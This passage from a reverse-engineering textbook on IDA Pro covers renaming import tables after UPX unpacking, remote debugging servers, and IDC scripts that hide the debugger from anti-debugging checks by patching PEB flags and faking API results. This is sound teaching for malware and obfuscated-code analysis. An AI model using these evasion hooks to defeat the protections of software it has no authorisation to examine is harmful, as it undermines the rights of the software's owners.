ing text as the name of the import table entry. The only problem with this

approach is the fact that library names and function names may both contain

underscore characters, making it difficult in some cases to determine the

exact length of a function’s name within a longer name string. Recognizing

this difficulty, this is nonetheless the approach taken by the renimp.idc import

table–renaming script that ships with IDA (found in <IDADIR>/idc).

In order for this script to execute properly, it must be run while the

debugger is active (so that it has access to loaded library names), and we must

be able to locate the reconstructed import table within the de-obfuscated

binary. One strategy for determining where the reconstructed import table

will lie is to track calls to GetProcAddress and note where the results are stored

into memory. Listing 25-3 shows the code used by UPX to call GetProcAddress

and store the result.

UPX1:00408897 Xcall dword ptr [esi+8090h]

UPX1:0040889D or eax, eax

UPX1:0040889F jz short loc_4088A8

UPX1:004088A1 Ymov [ebx], eax

UPX1:004088A3 Zadd ebx, 4

Listing 25-3: UPX code to resolve and store imported function addresses

The call to GetProcAddress takes place at X, with the result being stored

into memory at Y. Making note of the value held in the ebx register at Y will

tell us where the import table is located. The ebx register is advanced by four

bytes at Z to prepare it for the next iteration of the function resolution loop.

Once we have located the reconstructed import table, renimp.idc requires

that we highlight the contents of the table using a click-and-drag operation

from the beginning to the end of the table. The renimp.idc script iterates across

the selection, obtains the name of the referenced function, strips the library

Disassembler/Debugger Integration 553

name prefix, and names the import table entry accordingly. Following execu-

tion of this script, the import table shown previously is transformed into the

import table shown here:

UPX1:0040A000 ; LPSTR __stdcall GetCommandLineA()

UPX1:0040A000 GetCommandLineA dd offset kernel32_GetCommandLineA

UPX1:0040A000 ; DATA XREF: UPX0:loc_40128FÇr

UPX1:0040A000 ; start+1Èo

UPX1:0040A004 RtlFreeHeap dd offset ntdll_RtlFreeHeap ; DATA XREF: UPX0:004011E4Çr

UPX1:0040A004 ; UPX0:0040120AÇr ...

UPX1:0040A008 ; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)

UPX1:0040A008 GetVersionExA dd offset kernel32_GetVersionExA ; DATA XREF: UPX0:004011D4Çr

UPX1:0040A00C RtlAllocateHeap dd offset ntdll_RtlAllocateHeap ; DATA XREF: UPX0:004011B3Çr

UPX1:0040A00C ; sub_405E98+DÇr ...

UPX1:0040A010 ; HANDLE __stdcall GetProcessHeap()

UPX1:0040A010 GetProcessHeap dd offset kernel32_GetProcessHeap ; DATA XREF: UPX0:004011AAÇr

UPX1:0040A014 RtlEnterCriticalSection dd offset ntdll_RtlEnterCriticalSection

UPX1:0040A014 ; DATA XREF: sub_401564+34Çr

UPX1:0040A014 ; sub_4015A0+27Çr ...

We see that the script has done the work of renaming each import table

entry, but IDA has added function prototypes for each function whose type

information IDA is aware of. Note that no type information would be visible

if the library name prefix had not been stripped from each function name.

The renimp.idc script can fail to properly extract an imported function name

when the name of the module in which the function resides contains an

underscore. The ws2_32 networking library is a well-known example of a

module whose name happens to contain an underscore. Special handling

of ws2_32 takes place within renimp.idc; however, any other module whose

name contains an underscore will cause renimp.idc to parse function names

incorrectly.

An alternative approach to renaming import table entries may be

employed when a single instruction is responsible for storing all resolved

function addresses as UPX does in Listing 25-3. If such an instruction can

be identified, such as the instruction at Y in the listing, then we can take

advantage of the fact that breakpoint conditions in IDA are specified using

IDC statements. In this case we might set a conditional breakpoint at address

004088A1 and make the conditional expression invoke a function that we define.

Here we name the function createImportLabel and define it as follows:

static createImportLabel() {

auto n = Name(EAX);

auto i = strstr(n, "_");

while (i != -1) {

n = n[i+1:];

i = strstr(n, "_");

}

MakeUnkn(EBX,DOUNK_EXPAND);

MakeDword(EBX);

554 Chapter 25

if (MakeNameEx(EBX,n,SN_NOWARN) == 0) {

MakeNameEx(EBX,n + "_",SN_NOWARN);

}

return 0;

}

This function begins by querying for the name referenced by EAX.

Recall that EAX contains the result of the call to GetProcAddress and thus

should refer to a function within some DLL. Next, the function loops to trun-

cate the name to just that portion following the last underscore found in the

original name. Finally, a series of function calls is made to properly format

the target location (referenced by EBX) as a 4-byte data item, and apply a

name to that location. By returning zero, the function informs IDA that the

breakpoint should not be honored, with the result that execution continues

without pausing.

In Chapter 24, we discussed how to specify breakpoint conditions in IDA’s

debugger. Installing a user-defined function as a breakpoint handler is not

quite as straightforward as setting and editing a breakpoint and entering

createImportLabel() as the breakpoint condition. While this is exactly the con-

dition that we wish to enter in this case, the problem is that, from IDA’s per-

spective, createImportLabel is an undefined function. The workaround for

this is to create a script file (IDC by definition) containing our function

along with a simple main function that looks something like the following:

static main() {

XAddBpt(ScreenEA());

YSetBptCnd(ScreenEA(), "createImportLabel()");

}

Placing the cursor on the instruction that you wish to set the breakpoint

on and then running this script (FileScript File) results in a conditional

breakpoint that calls createImportLabel each time it is hit. The AddBpt function

Xadds a breakpoint at the specified location (the cursor location in this case),

and the SetBptCnd function Y adds a condition to an existing breakpoint.

The condition is specified as a string containing the IDC statement to evalu-

ate each time the breakpoint is hit. With this breakpoint in place, once the

de-obfuscation has completed, we will have a labeled import table without

having to go through the trouble of locating the table within the process’s

memory space.

Yet another approach for deriving name information involves searching

memory for the file headers associated with a function address and then

parsing the export table described in those headers to locate the name

of the function being referenced. This is essentially a reverse lookup of a

function name given the function’s address. Scripts (RebuildImports.idc/

RebuildImports.py) based on this concept are available on the book’s website.

Either of these scripts may be executed in lieu of renimp.idc with nearly iden-

tical results. The problems faced by renimp.idc when dealing with modules

Disassembler/Debugger Integration 555

whose names contain an underscore character are avoided because function

names are extracted directly from export tables present in the process address

space.

The effect of naming each import table entry properly carries through

to the disassembly itself, as shown in the following automatically updated dis-

assembly listing:

UPX0:00403C5B call ds:RtlFreeHeap

UPX0:00403C61 test eax, eax

UPX0:00403C63 jnz short loc_403C7B

UPX0:00403C65 call sub_40230F

UPX0:00403C6A mov esi, eax

UPX0:00403C6C call ds:RtlGetLastWin32Error

The name of each renamed import table entry is propagated to all loca-

tions from which imported functions are called, making the disassembly far

more readable. It is worth noting that any formatting changes that you make

while you’re working within the debugger are automatically applied to the

database view as well. In other words, there is no need to take a memory

snapshot simply to capture formatting changes that you have made. The pur-

pose of a memory snapshot is to migrate memory content (code and data)

from a processes address space back into an IDA database.

Hiding the Debugger

A popular method of preventing the use of debuggers as de-obfuscation

tools is debugger detection. The authors of obfuscation tools understand just

as well as you do that debuggers are useful for undoing their handiwork.

In response, they often take measures to prevent their tools from running

if the tools detect the presence of a debugger. We discussed a few debugger-

detection methods in Chapter 21. As mentioned in Chapter 21, Nicolas

Falliere’s article “Windows Anti-Debug Reference”8 contains an excellent

summary of a number of Windows-specific techniques for detecting the pres-

ence of a debugger. You can counter several of these detection techniques by

using a simple script to start your debugger session and automatically config-

ure some breakpoints. While it is possible to use Python to counter some of

these techniques, we will ultimately be using conditional breakpoints, which

we can only specify using IDC. For this reason the sample code that follows is

all written in IDC.

In order to launch a debugging session from a script, we begin with the

following code:

auto n;

for (n = 0; n < GetEntryPointQty(); n++) {

auto ord = GetEntryOrdinal(n);

if (GetEntryName(ord) == "TlsCallback_0") {

AddBpt(GetEntryPoint(ord));

break;

8. See http://www.symantec.com/connect/articles/windows-anti-debug-reference/.

556 Chapter 25

}

RunTo(BeginEA());

GetDebuggerEvent(WFNE_SUSP, -1);

These statements check for the presence of a TLS callback function, set

a breakpoint if one is found, and then launch the debugger, requesting to

break on the entry point address before waiting for the operation to com-

plete (strictly speaking, we should test the return value of GetDebuggerEvent as

well). Once our script regains control, we have an active debugger session,

and the process we wish to debug is mapped into memory along with all

libraries on which it depends.

The first debugger detection we will bypass is the IsDebugged field of the

process environment block (PEB). This is a 1-byte field that is set to the value 1

if the process is being debugged and 0 otherwise. The field lies 2 bytes into

the PEB, so all we need to do is find the PEB and patch the proper byte to the

value 0. This also happens to be the field tested by the Windows API function

IsDebuggerPresent, so we manage to kill two birds with one stone in this case.

If we know that we have stopped at the program entry point as opposed to a

TLS callback, then locating the PEB turns out to be rather simple, because the

EBX register contains a pointer to the PEB upon entry to the process. If

instead the process has stopped at a TLS callback function, then we need a

more general-purpose means of finding the PEB. We will take an approach

similar to that often used in shellcode and obfuscators. The basic idea is to

locate the current thread information block (TIB)9 and follow an embedded

pointer to find the PEB. The following code locates the PEB and makes the

appropriate patch:

auto seg;

auto peb = 0;

auto tid = GetCurrentThreadId();

auto tib = sprintf("TIB[%08X]", tid); //IDA naming convention

for (seg = FirstSeg(); seg != BADADDR; seg = NextSeg(seg)) {

if (SegName(seg) == tib) {

peb = Dword(seg + 0x30); //read PEB pointer from TIB

break;

}

if (peb != 0) {

PatchDbgByte(peb + 2, 0); //Set PEB!IsDebugged to zero

}

Note that the PatchDbgByte function was not introduced until IDA 5.5.

When used with versions prior to IDA 5.5, PatchByte will work but will also

modify (patch) the database if the address specified is present in the database.

Another anti-debugging technique mentioned in Falliere’s article

involves testing several bits in another field of the PEB named NtGlobalFlags.

The bits relate to the operation of a process’s heap and are set to 1 when a

9. This is also known as a thread environment block (TEB).

Disassembler/Debugger Integration 557

process is being debugged. Assuming variable peb remains set from the previ-

ous example, the following code retrieves the NtGlobalFlags field from the

PEB, resets the offending bits, and stores the flags back into the PEB.

globalFlags = Dword(peb + 0x68) & ~0x70; //read and mask PEB.NtGlobalFlags

PatchDword(peb + 0x68, globalFlags); //patch PEB.NtGlobalFlags

Several techniques in Falliere’s article rely on differences in information

returned by system functions when a process is being debugged as opposed

to when a process is not being debugged. The first function mentioned in

the article is NtQueryInformationProcess, found in ntdll.dll. Using this function,

a process may request information regarding its ProcessDebugPort. If the pro-

cess is being debugged, the result is non-zero; if it is not being debugged,

the result should be zero. One way to avoid detection in this manner is to set

a breakpoint on NtQueryInformationProcess and then specify a breakpoint con-

dition function to filter out ProcessDebugPort requests. In order to automati-

cally locate this instruction, we take the following steps:

1. Look up the address of NtQueryInformationProcess.

2. Set a breakpoint on NtQueryInformationProcess.

3. Add a breakpoint condition to call a function we will name

bpt_NtQueryInformationProcess, which will be executed each time

NtQueryInformationProcess gets called.

In order to find the address of NtQueryInformationProcess, we need to

remember that the function will be named ntdll_NtQueryInformationProcess in

the debugger. The code to configure the necessary breakpoint appears here:

func = LocByName("ntdll_NtQueryInformationProcess");

AddBpt(func);

SetBptCnd(func, "bpt_NtQueryInformationProcess()");

What remains is for us to implement the breakpoint function that will

keep the debugger hidden from an inquiring process. The prototype for

NtQueryInformationProcess is shown here:

NTSTATUS WINAPI NtQueryInformationProcess(

__in HANDLE ProcessHandle,

X __in PROCESSINFOCLASS ProcessInformationClass,

Y __out PVOID ProcessInformation,

__in ULONG ProcessInformationLength,

__out_opt PULONG ReturnLength

);

Information about a process is requested by providing an integer query

identifier in the ProcessInformationClass parameter X. Information is returned

via the user-supplied buffer pointed to by the ProcessInformation parameter Y.

A caller may pass the enumerated constant ProcessDebugPort (value 7) in

558 Chapter 25

order to query the debugging status of a given process. If a process is being

debugged by a user-space debugger, the return value passed via the supplied

pointer will be non-zero. If the process is not being debugged, the return

value will be zero. A breakpoint function that always sets the ProcessDebugPort

return value to zero is shown here:

#define ProcessDebugPort 7

static bpt_NtQueryInformationProcess() {

auto p_ret;

X if (Dword(ESP + 8) == ProcessDebugPort) {//test ProcessInformationClass

Yp_ret = Dword(ESP + 12);

Zif (p_ret) {

[PatchDword(p_ret, 0); //fake no debugger present

}

\EIP = Dword(ESP); //skip function, just return

]ESP = ESP + 24; //stdcall so clear args from stack

^EAX = 0; //signifies success

}

return 0; //don’t pause at the breakpoint

}

Recall that this function is invoked each time NtQueryInformationProcess

is called. On entry, the stack pointer is pointing to the saved return address,

which lies on top of the five arguments to NtQueryInformationProcess. The break-

point function begins by examining the value of the ProcessInformationClass to

determine whether the caller is requesting ProcessDebugPort information X.

If the caller is requesting ProcessDebugPort, the function continues by retrieving

the return value pointer Y, testing that it is non-null Z, and finally storing

a return value of zero [ to make it appear that no debugger is attached. In

order to skip the remainder of the function, EIP is then modified by reading

the saved return address \, after which ESP is adjusted to simulate a stdcall

return ]. NtQueryInformationProcess returns an NTSTATUS code, which is set

to 0 (success) at ^ before returning.

Another function mentioned in Falliere’s article is NtSetInformationThread,

which is also found in ntdll.dll. The prototype for this function is shown here:

NTSTATUS NtSetInformationThread(

IN HANDLE ThreadHandle,

IN THREADINFOCLASS ThreadInformationClass,

IN PVOID ThreadInformation,

IN ULONG ThreadInformationLength

);

Disassembler/Debugger Integration 559

The anti-debugging technique involves passing the value

ThreadHideFromDebugger in the ThreadInformationClass parameter, which

causes a thread to be detached from a debugger. Bypassing this technique

involves the same basic setup as the previous example. The resulting setup

code is shown here:

func = LocByName("ntdll_NtSetInformationThread");

AddBpt(func); //break at function entry

SetBptCnd(func, "bpt_NtSetInformationThread()");

The associated breakpoint function is shown here:

#define ThreadHideFromDebugger 0x11

static bpt_NtSetInformationThread() {

Xif (Dword(ESP + 8) == ThreadHideFromDebugger) {//test ThreadInformationClass

YEAX = 0; //STATUS_SUCCESS

ZEIP = Dword(ESP); //just return

[ESP = ESP + 20; //simulate stdcall

}

return 0;

}

On entry we test the value of the ThreadInformationClass parameter X

and bypass the function body if the user has specified ThreadHideFromDebugger.

Bypassing the function body is accomplished by setting our desired return

value Y and modifying the instruction pointer by reading the saved return

address out of the stack Z. We simulate the stdcall return by making a 20-byte

adjustment to ESP [.

The last function that we will discuss, whose use as an anti-debugging

technique is also discussed in Falliere’s article, is OutputDebugStringA from

kernel32.dll. The prototype of this function is shown here:

void WINAPI OutputDebugStringA(

__in_opt LPCTSTR lpOutputString

);

In this example, WINAPI is a synonym for _stdcall and is used to specify

the calling convention employed by OutputDebugStringA. Strictly speaking,

this function has no return value, as specified by the void return type in its

prototype; however, according to the article, this function “returns” 1 when

no debugger is attached to the calling process, and it “returns” the address

of the string passed as a parameter if it is called while a debugger is attached

to the calling process. Under normal circumstances, _stdcall functions that

do return a value return that value in the EAX register. Since EAX must hold

560 Chapter 25

some value when OutputDebugStringA returns, it can be argued that this is the

return value of the function; however, since the official return type is void,

there is no documentation or guarantee as to what value EAX may actually

hold in this case. This particular anti-debugging technique simply relies on

the observed behavior of the function. One solution to the observed change

in return values is to ensure that EAX contains 1 whenever OutputDebugStringA

returns. The following IDC code implements this technique:

func = LocByName("kernel32_OutputDebugStringA");

AddBpt(func);

//fix the return value as expected in non-debugged processes

//also adjust EIP and ESP

X SetBptCnd(func, "!((EAX = 1) && (EIP = Dword(ESP)) && (ESP = ESP + 8))");

This example uses the same technique for automatically locating the end

of the OutputDebugStringA function that we used in the preceding examples.

However, in contrast to the preceding example, the work that needs to be

done when the breakpoint is hit is simple enough to be specified in an IDC

expression X (rather than requiring a dedicated function). In this case, the

breakpoint expression modifies (note this is assignment rather than compar-

ison) the EAX register to ensure that it contains 1 when the function returns

and also adjusts EIP and ESP to bypass the function. The breakpoint condi-

tion is negated to cause the breakpoint to be skipped in all cases, because the

result of the Boolean and expression is always expected to be nonzero.

A script (HideDebugger.idc) that combines all of the elements presented

in this section into a useful tool for simultaneously initiating debugging ses-

sions and implementing measures to combat anti-debugging attempts is

available on the book’s website. For more information on hiding the pres-

ence of the debugger, please see Ilfak’s blog, where he presents several hid-

ing techniques.10

IdaStealth

While the HideDebugger script discussed in the previous section is useful for

demonstrating some basic programmatic interaction with the debugger and

some basics of library function hooking, the total number of known anti-

debugging techniques and the complexity of those techniques argue for

more robust anti-anti-debugging than can be provided by a simple script.

Fortunately, the IdaStealth plug-in is designed to meet our needs for a power

debugger-hiding capability. Written by Jan Newger, IdaStealth was the win-

ner of Hex-Rays’s 2009 plug-in writing contest. The plug-in is written in C++

and is available in both source and binary form.

10. See http://www.hexblog.com/2005/11/simple_trick_to_hide_ida_debug.html, http://www.hexblog

.com/2005/11/stealth_plugin_1.html, and http://www.hexblog.com/2005/11/the_ultimate_stealth_

method_1.html.

Disassembler/Debugger Integration 561

The binary components of IDAStealth consist of a plug-in and a helper

library, both of which need to be installed to <IDADIR>/plugins. Upon initial

activation, IDAStealth presents the configuration dialog shown in Figure 25-6.

Figure 25-6: IDAStealth configuration dialog

Several tabs full of options allow you to decide which anti-anti-debugging

techniques you wish to employ. Once activated, IDAStealth implements eva-

sion techniques for virtually every known debugger-detection technique,

including those discussed in the Falliere article and those addressed by the

HideDebugger.idc script developed earlier.

Dealing with Exceptions

Occasionally, programs expect to handle any exceptions generated during

their execution. As we saw in Chapter 21, obfuscated programs often go so

far as to intentionally generate exceptions as both an anti–control flow tech-

nique and an anti-debugging technique. Unfortunately, exceptions are often

Name IDAStealth

Author Jan Newger

Distribution C++Source and binary

Price Free

Description Windows debugger-hiding plug-in

Information http://www.newgre.net/idastealth/

562 Chapter 25

indicative of a problem, and the purpose of debuggers is to assist us in local-

izing problems. Therefore, debuggers typically want to handle all exceptions

that occur when a program is running in order to help us find bugs.

When a program expects to handle its own exceptions, we need to pre-

vent the debugger from intercepting such exceptions, or, at a minimum, once

an exception is intercepted, we need a means to have the debugger forward

the exception to the process at our discretion. Fortunately, IDA’s debugger

has the capability to pass along individual exceptions as they occur or to auto-

matically pass along all exceptions of a specified type.

Automated exception processing is configured via the Debugger

Debugger Options command; the resulting dialog is shown in Figure 25-7.

Figure 25-7: The Debugger Setup

dialog

In addition to allowing several events to be configured to automatically

stop the debugger and a number of events to be automatically logged to

IDA’s message window, the Debugger Setup dialog is used to configure the

debugger’s exception-handling behavior. The Edit Exceptions button opens

the Exceptions configuration dialog shown in Figure 25-8.

Disassembler/Debugger Integration 563

Figure 25-8: The Exceptions configuration dialog

For each exception type known to the debugger, the dialog lists an oper-

ating system–specific exception code, the name of the exception, whether

the debugger will stop the process or not (Stop/No), and whether the debugger

will handle the exception or automatically pass the exception to the applica-

tion (Debugger/Application). A master list of exceptions and default settings

for handling each exception is contained in <IDADIR>/cfg/exceptions.cfg. In

addition, the configuration file contains messages to be displayed whenever

an exception of a given type occurs while the debugger is executing a pro-

cess. Changes to the debugger’s default exception-handling behavior may

be made by editing exceptions.cfg with a text editor. In exceptions.cfg, the values

stop and nostop are used to indicate whether the debugger should suspend

the process or not when a given exception occurs.

Exception handling may also be configured on a per-session (that is, while

you have a particular database open) basis by editing individual exceptions

via the Exceptions configuration dialog. To modify the debugger’s behavior

for a given exception type, right-click the desired exception in the Excep-

tions configuration dialog and select Edit. Figure 25-9 shows the resulting

Exception editing dialog.

Figure 25-9: The Exception editing dialog

Two options, corresponding to the two configurable options in exceptions

.cfg, may be configured for any exception. First, it is possible to specify whether

the debugger should stop the process when an exception of the specified

type occurs or whether execution should continue. Beware: Allowing the

process to continue may result in an infinite exception-generation loop if

you also elect to have the debugger handle the exception.

564 Chapter 25

The second configuration option allows you to decide whether a given

exception type should be passed to the application being debugged so the

application can have a chance to process the exception using its own excep-

tion handlers. When the proper operation of an application depends on

such exception handlers being executed, you should choose to pass the associ-

ated exception types to the application. This may be required when analyzing

obfuscated code such as that generated by the tElock utility (which registers

its own exception handlers) described in Chapter 21.

Unless you have configured IDA to continue execution and to pass a

specific exception type to the application, IDA will pause execution and

report exceptions to you as they occur. If you elect to continue execution of

the program, IDA will then display the Exception Handling dialog shown in

Figure 25-10.

Figure 25-10: The Exception Handling dialog

At this point you have the option of changing the manner in which IDA

handles the given exception type (Change exception definition), passing the

exception on to the application (Yes), or allowing IDA to eat the exception

(No). Passing the exception to the application allows the application to han-

dle the exception using any configured exception handlers. If you choose No,

IDA attempts to continue execution, which is likely to fail unless you have cor-

rected the condition that was responsible for causing the exception.

A special circumstance arises when you are single stepping through code

and IDA determines that the instruction you are about to execute will gener-

ate an exception, as is the case with an int 3, an icebp, or a popf that will set

the trace flag; IDA displays the dialog shown in Figure 25-11.

Figure 25-11: The exception confirmation dialog

Disassembler/Debugger Integration 565

In most cases, the Run option is the most suitable choice and results in

the application seeing the behavior that it expects when a debugger is not

attached (as noted in the dialog). In working through this dialog, you are

simply acknowledging that an exception is about to be generated. If you

choose Run, in short order you will then be notified that an exception has

occurred, and when you continue execution, you will be presented with the

Exception Handling dialog of Figure 25-10 to decide how the exception

should be dealt with.

Determining how an application will handle an exception requires that

we know how to trace exception handlers, which in turn requires that we

know how to locate exception handlers. Ilfak discusses tracing Windows SEH

handlers in a blog post titled “Tracing exception handlers.”11 The basic idea

is to locate any interesting exception handlers by walking the application’s

list of installed exception handlers. For Windows SEH exceptions, a pointer

to the head of this list may be found as the first dword in the thread environ-

ment block (TEB). The list of exception handlers is a standard linked-list

data structure that contains a pointer to the next exception handler in the

chain and a pointer to the function that should be called to handle any excep-

tion that is generated. Exceptions are passed down the list from one handler

to another until a handler chooses to handle the exception and notify the

operating system that the process may resume normal execution. If none

of the installed exception handlers choose to handle the current exception,

the operating system terminates the process or, when the process is being

debugged, notifies the debugger that an exception has occurred within

the debugged process.

Under the IDA debugger, TEBs are mapped to an IDA database section

named TIB[NNNNNNNN], where NNNNNNNN is the eight-digit hexadecimal represen-

tation of the thread’s identification number. The following listing shows an

example of the first dword in one such section:

TIB[000009E0]:7FFDF000 TIB_000009E0_ segment byte public 'DATA' use32

TIB[000009E0]:7FFDF000 assume cs:TIB_000009E0_

TIB[000009E0]:7FFDF000 ;org 7FFDF000h

X TIB[000009E0]:7FFDF000 dd offset dword_22FFE0

The first three lines show summary information about the segment,

while the fourth line X contains the first dword of the section, indicating

that the first exception handler record may be found at address 22FFE0h

(offset dword_22FFE0). If no exception handlers were installed for this particu-

lar thread, the first dword in the TEB would contain the value 0FFFFFFFFh,

indicating that the end of the exception handler chain had been reached. In

this example, examining two dwords at address 22FFE0h shows the following:

Stack[000009E0]:0022FFE0 Xdword_22FFE0 dd 0FFFFFFFFh ; DATA XREF: TIB[000009E0]:7FFDF000Èo

Stack[000009E0]:0022FFE4 Ydd offset loc_7C839AA8

11. See http://www.hexblog.com/2005/12/tracing_exception_handlers.html.

566 Chapter 25

The first dword X contains the value 0FFFFFFFFh, indicating that this is the

last exception handler record in the chain. The second dword Y contains

the address 7C839AA8h (offset loc_7C839AA8), indicating that the function at

loc_7C839AA8 should be called to process any exceptions that may arise during

the execution of the process. If we were interested in tracing the handling

of any exceptions in this process, we might begin by setting a breakpoint at

address 7C839AA8h.

Because it is a relatively simple task to walk the SEH chain, a useful fea-

ture for the debugger to implement would be a display of the chain of SEH

handlers that are installed for the current thread. Given such a display, it

should be easy to navigate to each SEH handler, at which point you may

decide whether you want to insert a breakpoint within the handler or not.

Unfortunately, this is another feature available in OllyDbg that is not avail-

able in IDA’s debugger. To address this shortcoming, we have developed

an SEH Chain plug-in, which, when invoked from within the debugger,

will display the list of exception handlers that are installed for the current

thread. An example of this display is shown in Figure 25-12.

Figure 25-12: The SEH Chain display

This plug-in utilizes the SDK’s choose2 function to display a nonmodal

dialog that lists the current exception-handler chain. For each installed

exception handler, the address of the exception-handler record (the two-

dword list record) and the address of the corresponding exception handler

are displayed. Double-clicking an exception handler jumps the active dis-

assembly view (either IDA View-EIP or IDA View-ESP) to the address of the

SEH handler function. The entire purpose of this plug-in is to simplify the

process of locating exception handlers. The source code for the SEH Chain

plug-in may be found on the website for this book.

The flip side of the exception-handling process is the manner in which

an exception handler returns control (if it chooses to do so) to the applica-

tion in which the exception occurred. When an exception-handler function

is called by the operating system, the function is granted access to all of the

CPU register’s contents as they were set at the moment the exception took

place. In the process of handling the exception, the function may elect to

modify one or more CPU register values prior to returning control to the

application. The intent of this process is for an exception handler to be given

the opportunity to repair the state of the process sufficiently so that the pro-

cess may resume normal execution. If the exception handler determines that

the process should be allowed to continue, the operating system is notified,

and the process’s register values are restored, using any modifications made

by the exception handler. As discussed in Chapter 21, some anti–reverse

engineering utilities make use of exception handlers to alter a process’s

Disassembler/Debugger Integration 567

flow of execution by modifying the saved value of the instruction pointer

during the exception-handling phase. When the operating system returns

control to the affected process, execution resumes at the address specified by

the modified instruction pointer.

In his blog post on tracing exceptions, Ilfak discusses the fact that Win-

dows SEH exception handlers return control to the affected process via the

ntdll.dll function NtContinue (also known as ZwContinue). Since NtContinue has

access to all of the process’s saved register values (via one of its arguments), it

is possible to determine exactly where the process will resume execution by

examining the value contained in the saved instruction pointer from within

NtContinue. Once we know where the process is set to resume execution, we

can set a breakpoint in order to avoid stepping through operating system

code and to stop the process at the earliest opportunity once it resumes exe-

cution. The following steps outline the process we need to follow:

1. Locate NtContinue and set a nonstopping breakpoint on its first instruction.

2. Add a breakpoint condition to this breakpoint.

3. When the breakpoint is hit, obtain the address of the saved registers by

reading the CONTEXT pointer from the stack.

4. Retrieve the process’s saved instruction pointer value from the CONTEXT

record.

5. Set a breakpoint on the retrieved address and allow execution to

continue.

Using a process similar to the debugger-hiding script, we can automate

all of these tasks and associate them with the initiation of a debugging ses-

sion. The following code demonstrates launching a process in the debugger

and setting a breakpoint on NtContinue:

static main() {

auto func;

RunTo(BeginEA());

GetDebuggerEvent(WFNE_SUSP, -1);

func = LocByName("ntdll_NtContinue");

AddBpt(func);

SetBptCnd(func, "bpt_NtContinue()");

}

The purpose of this code is simply to set a conditional breakpoint on the

entry of NtContinue. The behavior of the breakpoint is implemented by the

IDC function bpt_NtContinue, which is shown here:

static bpt_NtContinue() {

X auto p_ctx = Dword(ESP + 4); //get CONTEXT pointer argument

Y auto next_eip = Dword(p_ctx + 0xB8); //retrieve eip from CONTEXT

Z AddBpt(next_eip); //set a breakpoint at the new eip

[ SetBptCnd(next_eip, "Warning(\"Exception return hit\") || 1");

568 Chapter 25

return 0; //don’t stop

}

This function locates the pointer to the process’s saved register context

information X, retrieves the saved instruction pointer value from offset 0xB8

within the CONTEXT structure Y, and sets a breakpoint on this address Z. In

order to make it clear to the user why execution has stopped, a breakpoint

condition (which is always true) is added to display a message to the user [.

We choose to do this because the breakpoint was not set explicitly by the

user, and the user may not correlate the event to the return from an excep-

tion handler.

This example represents a simple means of handling exception returns.

Much more sophisticated logic could be added to the breakpoint function

bpt_NtContinue. For example, if you suspect that an exception handler is

manipulating the contents of debug registers, perhaps to prevent you from

setting hardware breakpoints, you might opt to restore the values of the

debug registers to known good values prior to returning control to the pro-

cess being debugged.

Summary

In addition to their obvious uses in tracking down bugs in software, debug-

gers may also be used as effective reverse engineering tools. For malware and

obfuscated code analysis, the ability to utilize a single application for both

static and dynamic analysis can save valuable time and the effort required to

generate data with one tool that can be analyzed with a second tool. Given

the wide variety of debuggers available today, IDA’s debugger may not be the

ideal choice for tracking down runtime problems in your applications. How-

ever, if you anticipate the need to conduct any reverse engineering of an

application or if you simply desire a high-quality disassembly to refer to dur-

ing the debugging process, IDA’s debugger may serve your needs well. In

Chapter 26, we conclude the book by covering more advanced features of

IDA’s debugger, including remote debugging and debugging on Linux and

OS X.

JMP

EBP

SUB

ADDITIONAL DEBUGGER

FEATURES

Over the last two chapters, we have covered

the majority of the debugger’s basic features

including scripting debugger actions, as well as

its usefulness in de-obfuscating code. In this chapter,

we round out our discussion of the debugger by looking

at remote debugging with IDA, the use of the Bochs x86 emulator1 as a debug-

ging platform, and the Appcall2 feature that effectively extends IDA’s scripting

capabilities to include any function defined with a process and its associated

libraries.

Remote Debugging with IDA

All versions of IDA ship with server components designed to facilitate remote

debugging sessions. In addition, IDA is capable of interfacing with remote

gdb sessions that make use of gdb_server or built-in gdb stubs. One of the

1. See http://bochs.sourceforge.net/.

2. See http://www.hexblog.com/?p=112.

570 Chapter 26

principal advantages of remote debugging is the ability to use the GUI

debugger interface as a frontend for any debugging session. For the most

part, other than initial setup and establishing the connection to the remote

debugging server, remote debugging sessions differ little from local debug-

ging sessions.

Using a Hex-Rays Debugging Server

Remote debugging begins by launching an appropriate debugging server

component on the computer on which a process is to be debugged. IDA

ships with the following server components:

win32_remote.exe Server component executed on Windows computers

for the purpose of debugging 32-bit Windows applications

win64_remotex64.exe Server component executed on 64-bit Windows

computers for the purpose of debugging 64-bit Windows applications

(IDA Advanced only)

wince_remote_arm.dll Server component uploaded to Windows CE

devices (via ActiveSync)

mac_server Server component executed on OS X computers for the pur-

pose of debugging 32-bit OS X applications

mac_serverx64 Server component executed on 64-bit OS X computers

for the purpose of debugging 64-bit OS X applications (IDA Advanced

only)

linux_server Server component executed on Linux computers for the

purpose of debugging 32-bit Linux applications

linux_serverx64 Server component executed on 64-bit Linux computers

for the purpose of debugging 64-bit Linux applications (IDA Advanced

only)

armlinux_server Server component executed on ARM-based computers

for the purpose of debugging ARM applications

android_server Server component executed on Android devices for the

purpose of debugging Android applications

In order to perform remote debugging on any platform, the only compo-

nent you are required to execute on that platform is the appropriate server

component. It is not necessary to install a full version of IDA on the remote

platform. In other words, if you intend to use a Windows version of IDA as

your debugging client, and you wish to remotely debug Linux applications,

the only file, other than the binary that is being debugged, that you need to

copy to and execute on the Linux system is linux_server.3

3. Note that the *_server binaries distributed with IDA depend on a number of shared libraries.

You can use ldd (or otool -L on OS X) to list these dependencies.

Additional Debugger Features 571

Regardless of the platform you intend to run the server on, the server

components accept three command-line options, as listed here:

-p<port number>is used to specify an alternate TCP port for the server

to listen on. The default port is 23946. Note that no space should be

entered between the -p and the port number.

-P<password>is used to specify a password that must be supplied in

order for a client to connect to the debug server. Note that no space

should be entered between the -P and the provided password.

-v places the server in verbose mode.

There is no option to restrict the IP address on which the server listens.

If you wish to restrict incoming connections, you may do so using host-based

firewall rules as applicable to your debugging platform. Once a server has

been launched, IDA may be executed from any supported operating system

and used to provide a client interface to the debug server; however, a server

can handle only one active debugging session at any given time. If you wish

to maintain several simultaneous debugging sessions, you must launch sev-

eral instances of the debugging server on several different TCP ports.

From the client perspective, remote debugging is initiated by specifying

a server hostname and ports via the DebuggerProcess Options command,

as shown in Figure 26-1. This action must be performed prior to starting or

attaching to the process you intend to debug.

Figure 26-1: The debugger process options dialog

The first four fields in this dialog apply to both local and remote debug-

ging sessions, while the Hostname, Port, and Password fields apply only to

remote debugging sessions. The fields of this dialog are summarized here.

Application The full path to the application binary that you wish to

debug. For local debugging sessions, this is a path in the local filesystem.

For a remote debugging session, this is the path on the debugging server.

If you choose not to use a full path, the remote server will search its cur-

